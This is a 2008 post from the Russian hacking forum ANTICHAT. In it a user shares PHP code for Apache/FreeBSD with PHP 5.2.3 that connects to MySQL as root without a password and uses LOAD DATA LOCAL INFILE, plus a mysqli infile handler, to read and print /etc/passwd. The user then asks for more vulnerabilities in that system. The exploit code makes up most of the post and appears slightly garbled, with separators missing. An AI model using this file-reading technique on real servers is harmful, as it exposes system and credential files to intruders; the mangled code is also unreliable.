HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Apache/2.0.63 (FreeBSD) PHP/5.2.3
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Apache/2.0.63 (FreeBSD) PHP/5.2.3
  #1  
Старый 26.06.2008, 15:57
fasty
Познающий
Регистрация: 09.05.2008
Сообщений: 67
С нами: 9476389

Репутация: 13
По умолчанию Apache/2.0.63 (FreeBSD) PHP/5.2.3
Нашол уязвимость на php 5.2.3

PHP код:
<?php  file_get_contents('/etc/passwd');  $l mysql_connect("localhost""root"); mysql_query("CREATE DATABASE a"); mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); mysql_connect("localhost""aaaa");  mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");  $result mysql_query("SELECT a FROM a.a"); while(list($row) = mysql_fetch_row($result)) print $row chr(10);  ?>  MySQLi:  <?php  function r($fp, &$buf$len, &$err) { print fread($fp$len); }  $m = new mysqli('localhost''aaaa''''a'); $m->options(MYSQLI_OPT_LOCAL_INFILE1); $m->set_local_infile_handler("r"); $m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close();  ?>
Что нужно для этого експлоита?доступ?
Может ктота подскажет еще уязвимости на эту систему)
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось fasty; 26.06.2008 в 19:01..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новые сравнения производительности FreeBSD и Linux zythar Мировые новости. Обсуждения. 5 08.03.2008 23:27
Обзор новшеств в FreeBSD 7.0 zythar Мировые новости. Обсуждения. 2 28.02.2008 12:43
Вышла операционная система FreeBSD 6.3 Mr. P.S. Мировые новости. Обсуждения. 1 19.01.2008 00:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.